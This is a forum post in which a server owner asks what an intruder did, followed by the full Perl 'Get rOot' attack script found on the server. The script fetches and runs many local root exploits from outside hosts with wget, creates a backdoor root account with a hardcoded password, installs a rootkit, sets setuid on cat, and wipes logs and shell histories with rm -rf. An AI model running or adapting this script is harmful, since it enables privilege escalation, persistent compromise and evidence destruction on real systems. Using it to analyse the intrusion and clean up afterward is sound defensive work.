I didn't get help from host. I will check the user uploading form.
Can you tell me what has he tried / done in my server from this coding?
PHP Code:
#!/usr/bin/perl -w
if(@ARGV < 1){
print q (
#=============[ rOot Toolz ]=============#
| uid=0(root) gid=0(root) groups=0(root) |
| Get|rOot v1.0 |
| Use : perl ro0tget.pl -1 |
| THNK 2 : SarBoT511 SadHacKer SiLver.47 |
| i-Hmx The injector Z1d No-QrQr Fox HaC |
#=============[ Local root ]=============#
| Local root 2010 FreeBsD -7 |
| Local root aLL Exploit -8 |
| Local Root Privilege Escalation -9 |
#=============[ after root ]=============#
| More about GeT rOoT version 1.0 -ab |
| Help My i need help -he |
#========================================#
#============[ Local root ]==============#
| uid=0(root) gid=0(root) groups=0(root)|
| Local root 2010 x86_64 2.6.18-194 -1 |
| Local root 2009 i686 2.6.18-128 -2 |
| Local root 2008 2.6.18 -3 |
| Local root 2007 x86_64 2.6.22-6 -4 |
| all Local root -5 |
#============[ after root ]==============#
| Add root Account -r |
| add rootkit v4-team -t |
| rm -rf Log -rm |
#============[ about ]==============#
| GeT rOoT By Or4nG.M4n version 1.0 |
| priv8te [ @ ] Hotmail [ . ] com |
#========================================#
sec4ever.com | v4-team.com
);
exit;
}
if ($ARGV[0] =~ "-t" )
{
print "add Shell tools [ t ]\n";
system "wget http";
system "cd /usr/bin;chmod +s cat";
sleep(2);
print "\tcompleted .. \n\n";
}
if ($ARGV[0] =~ "-1" )
{
print "Local root 2010 x86_64 2.6.18-194 [ 1 ]\n";
system "pwd";
system "wget http://trav1an.t35.com/Localz/Localz-1";
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 Localz-1";
sleep(2);
print "\tcompleted .. \n\n";
system "./Localz-1";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
}
if ($ARGV[0] =~ "-2" )
{
print "Local root 2009 i686 2.6.18-128 [ 2 ]\n";
system "pwd";
system "wget http://trav1an.t35.com/Localz/Localz-2";
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 Localz-2";
sleep(2);
print "\tcompleted .. \n\n";
system "./Localz-2";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
}
if ($ARGV[0] =~ "-3" )
{
print "Local root 2008 i686 2.6.18 [ 3 ]\n";
system "pwd";
system "wget http://trav1an.t35.com/Localz/Localz-3";
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 Localz-3";
sleep(2);
print "\tcompleted .. \n\n";
system "./Localz-3";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
}
if ($ARGV[0] =~ "-4" )
{
print "Local root 2007 x86_64 2.6.22-6 [ 4 ]\n";
system "pwd";
system "wget http://trav1an.t35.com/Localz/Localz-4";
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 Localz-4";
sleep(2);
print "\tcompleted .. \n\n";
system "./Localz-4";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
}
if ($ARGV[0] =~ "-7" )
{
print "Local root 2010 FreeBsD [ bsd ]\n";
system "wget http://trav1an.t35.com/Localz/all/loc4l";
system "chmod 777 loc4l";
system "wget http://trav1an.t35.com/Localz/all/bsdlocal";
system "chmod 777 bsdlocal";
system "wget http://trav1an.t35.com/Localz/all/FreeBSDmaster.passwd.c";
system "chmod 777 FreeBSDmaster.passwd.c";
}
if ($ARGV[0] =~ "-8" )
{
print "Local root aLL Exploit [ pri ]\n";
system "wget http://trav1an.t35.com/Localz/all/2.4.20";
system "chmod 777 2.4.20";
system "wget http://trav1an.t35.com/Localz/all/2.4.29";
system "chmod 777 2.4.29";
system "wget http://trav1an.t35.com/Localz/all/2.4.34";
system "chmod 777 2.4.34";
system "wget http://trav1an.t35.com/Localz/all/2.6.8.c";
system "chmod 777 2.6.8.c";
system "wget http://trav1an.t35.com/Localz/all/2.6.6-34.c";
system "chmod 777 2.6.6-34.c";
print "\tcompleted .. \n\n";
print "\t ok now you can tray any Local";
}
if ($ARGV[0] =~ "-9" )
{
print "Local Root Privilege Escalation [ xpl ]\n";
system "pwd";
system 'printf "install uprobes /bin/sh" > exploit.conf; MODPROBE_OPTIONS="-C exploit.conf" staprun -u whatever';
sleep(2);
print "\tcompleted .. \n\n";
system "uname -a;su;id";
}
if ($ARGV[0] =~ "-5" )
{
system("wget http://www.clearwatercottages.com/modules/2010-1");
system("chmod 777 2010-1");
system("./2010-1");
system("id;whoami");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.clearwatercottages.com/modules/2010-2");
system("chmod 777 2010-2");
system("./2010-2");
system("id;whoami");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.clearwatercottages.com/modules/linux-rds-exploit");
system("chmod 777 linux-rds-exploit");
system("./linux-rds-exploit");
system("id;whoami");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.clearwatercottages.com/modules/i-can-haz-modharden");
system("chmod 777 i-can-haz-modharden");
system("./i-can-haz-modharden");
system("id;whoami");
system("wget http://www.solarens.com/templates/beez/2.6.34-2011");
system("chmod 777 2.6.34-2011");
system("./2.6.34-2011");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://www.schoolbd.com/adsense/cc/iskorpitx");
system("chmod 777 iskorpitx");
system("./iskorpitx");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/c");
system("chmod 777 c");
system("./c");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/d");
system("chmod 777 d");
system("./d");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/44");
system("chmod 777 44");
system("./44");
system("id");
system("wget http://www.schoolbd.com/adsense/cc/9521");
system("chmod 777 9521");
system("./9521");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/run97");
system("chmod 777 run97");
system("./97");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/froot");
system("chmod 777 froot");
system("./froot");
system("id");
system("id");
system("id");
system("id");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/18-1.c");
system("gcc -Wall -o 18-1 18-1.c");
system("gcc -Wall -m64 -o 18-3 18-1.c");
system("chmod 777 18-1");
system("chmod 777 18-3");
system("./18-1");
system("id");
system("./18-3");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/18-2");
system("chmod 777 18-2");
system("./18-2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/18-3");
system("chmod 777 18-3");
system("./18-3");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/18-5");
system("chmod 777 18-5");
system("./18-5");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exploit2");
system("chmod 777 exploit2");
system("./exploit2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exp1");
system("chmod 777 exp1");
system("./exp1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exp2");
system("chmod 777 exp2");
system("./exp2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exp3");
system("chmod 777 exp3");
system("./exp3");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/2009-1");
system("chmod 777 2009-1");
system("./2009-1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/3.c");
system("gcc 3.c -o 3");
system("chmod 777 3");
system("./3");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/3a");
system("chmod 777 3a");
system("./3a");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/4.c");
system("gcc 4.c -o 4");
system("chmod 777 4");
system("./4");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/4a");
system("chmod 777 4a");
system("./4a");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/cx.c");
system("gcc cx.c -o cx");
system("chmod 777 cx");
system("./cx");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/cxx.c");
system("gcc cxx.c -o cxx");
system("chmod 777 cxx");
system("./cxx");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exploit2");
system("chmod 777 exploit2");
system("./exploit2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/run");
system("chmod 777 run");
system("./run");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/rootsh.c");
system("gcc rootsh.c -o rootsh");
system("chmod 777 rootsh");
system("./rootsh");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/29.c");
system("gcc 29.c -o 29");
system("chmod 777 29");
system("./29");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/30");
system("chmod 777 30");
system("./30");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/2009");
system("chmod 777 2009");
system("./2009");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/pwnkernel");
system("chmod 777 pwnkernel");
system("./pwnkernel");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/05");
system("chmod 777 05");
system("./05");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/isko");
system("chmod 777 isko");
system("./isko");
system("id");
system("./isko");
system("isko");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/18");
system("chmod 777 18");
system("./18");
system("id");
system("./18");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/7");
system("chmod 777 7");
system("./7");
system("id");
system("./7");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/7-2");
system("chmod 777 7-2");
system("./7-2");
system("id");
system("./7-2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/8");
system("chmod 777 8");
system("./8");
system("id");
system("./8");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/8a");
system("chmod 777 8a");
system("./8a");
system("id");
system("./8a");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/8bb");
system("chmod 777 8bb");
system("./8bb");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/8cc");
system("chmod 777 8cc");
system("./8cc");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/8x");
system("chmod 777 8x");
system("./8x");
system("id");
system("./8x");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/2008");
system("chmod 777 2008");
system("./2008");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/exploit");
system("chmod 777 exploit");
system("./exploit");
system("id"); ;
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/2009xx");
system("chmod 777 2009xx");
system("./2009xx");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("wget http://www.schoolbd.com/adsense/cc/2.6.9-55-2007-prv8");
system("chmod 777 2.6.9-55-2007-prv8");
system("./2.6.9-55-2007-prv8");
system("id");
system("./2.6.9-55-2007-prv8");
system("id");
system("./2.6.9-55-2007-prv8");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
print "If u malesef rootlayamadin baska serverlerde mutlaka ama mutlaka:)by iskorpitx - Edit BY nO lOv3 \n";
}
if ($ARGV[0] =~ "-k" )
{
print "Local root 2009 i686 2.6.18-128 [ 2 ]\n";
system "wget http://grsecurity.net/~spender/64bit_dos.c";
sleep(2);
system("gcc 64bit_dos.c -o 64bit_dos");
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 64bit_dos";
sleep(2);
print "\tcompleted .. \n\n";
system "./64bit_dos";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://grsecurity.net/~spender/exploit.txt";
sleep(2);
system("gcc exploit.txt -o exploitcc");
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 exploitcc";
sleep(2);
print "\tcompleted .. \n\n";
system "./exploitcc";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://grsecurity.net/~spender/grlogalert.c";
sleep(2);
system("gcc grlogalert.c -o grlogalert");
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 grlogalert";
sleep(2);
print "\tcompleted .. \n\n";
system "./grlogalert";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://grsecurity.net/~spender/vmlinuz_to_vmlinux_gz.c";
sleep(2);
system("gcc vmlinuz_to_vmlinux_gz.c -o vmlinuz_to_vmlinux_gz");
sleep(2);
print "\tcompleted .. \n\n";
system "chmod 777 vmlinuz_to_vmlinux_gz";
sleep(2);
print "\tcompleted .. \n\n";
system "./vmlinuz_to_vmlinux_gz";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://grsecurity.net/~spender/crashvmlinuz";
print "\tcompleted .. \n\n";
system "chmod 777 crashvmlinuz";
sleep(2);
print "\tcompleted .. \n\n";
system "./crashvmlinuz";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://dazzlestudio.net/2.6.18-164";
print "\tcompleted .. \n\n";
system "chmod 777 2.6.18-164";
sleep(2);
print "\tcompleted .. \n\n";
system "./2.6.18-164";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
sleep(2);
system "wget http://alexoloughlinsplace.com/forum/NewDir/z1d-2011";
print "\tcompleted .. \n\n";
system "chmod 777 z1d-2011";
sleep(2);
print "\tcompleted .. \n\n";
system "./z1d-2011";
print "\tcompleted .. \n\n";
system "uname -a;pwd;id;su";
}
if ($ARGV[0] =~ "-ab" )
{
print q (
sec4ever.com
);
}
if ($ARGV[0] =~ "-t" )
{
print "Add Root Account [ r ]\n";
print "user : [ roor ]\n";
system "adduser -g 0 roor -G wheel,sys,bin,daemon,adm,disk -d /sf7 -s /bin/sh";
system "passwd r0otH4x0r";
print "pass is : r0otH4x0r\n";
sleep(2);
}
if ($ARGV[0] =~ "-d" )
{
system("wget http://pjk.danawa.my/templates/beez/priv8-2.6.18.2010");
system("chmod 777 priv8-2.6.18.2010");
system("./priv8-2.6.18.2010");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/priv8-2.6.18-164-2010");
system("chmod 777 priv8-2.6.18-164-2010");
system("./priv8-2.6.18-164-2010");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2");
system("chmod 777 2");
system("./2");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/1");
system("chmod 777 1");
system("./1");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2.6.18-194");
system("chmod 777 2.6.18-194");
system("./2.6.18-194");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2.6.32-21-generic-2010-i686");
system("chmod 777 2.6.32-21-generic-2010-i686");
system("./2.6.32-21-generic-2010-i686");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2.6.18-53");
system("chmod 777 2.6.18-53");
system("./2.6.18-53");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
system("wget http://pjk.danawa.my/templates/beez/2.6.18-53");
system("chmod 777 2.6.30");
system("./2.6.18-53");
system("id");
print "If u r r00t stop xpl with ctrl+c\n";
system("id");
}
if ($ARGV[0] =~ "-c" )
{
system "wget http://rbht.pp.ru/files/enlightenment.tgz";
sleep(2);
system "tar xzf enlightenment.tgz";
sleep(2);
system "cd enlightenment";
system "sed -i '/turn_\(on\|off\)_wp();/d' exploit.c";
sleep(2);
system "./run_null_exploits.sh";
sleep(2);
system "id";
system "id";
system "If u r r00t stop xpl with ctrl+c\n";
system "uname -a;su;id";
}
if ($ARGV[0] =~ "-rm" )
{
print "rm -rf Log [ rm ] \n";
system "rm -rf /tmp/logs";
system "rm -rf /root/.ksh_history";
system "rm -rf /root/.bash_history";
system "rm -rf /root/.bash_logout";
system "rm -rf /usr/local/apache/logs";
sleep(2);
system "rm -rf /usr/local/apache/log";
system "rm -rf /var/apache/logs";
system "rm -rf /var/apache/log";
system "rm -rf /var/run/utmp";
system "rm -rf /var/logs";
system "rm -rf /var/log";
sleep(2);
system "rm -rf /var/adm";
system "rm -rf /etc/wtmp";
system "rm -rf /etc/utmp";
system "cd /bin";
print "\tcompleted .. \n\n";
}
if ($ARGV[0] =~ "-v4" )
{
print "Add v4-team Rootkit [ v4 ]\n";
system "wget http://trav1an.t35.com/v4team-rootkit.tar.gz";
system "tar -xvvzf v4team-rootkit.tar.gz";
system "cd rootkit;./install";
print "user : wo7oshv4team , pass : v4teamhacker \n";
system "id";
print "\tcompleted .. \n\n";
}
if ($ARGV[0] =~ "-he" )
{
print q (
| Use : perl ro0tget.pl -1 |
);
}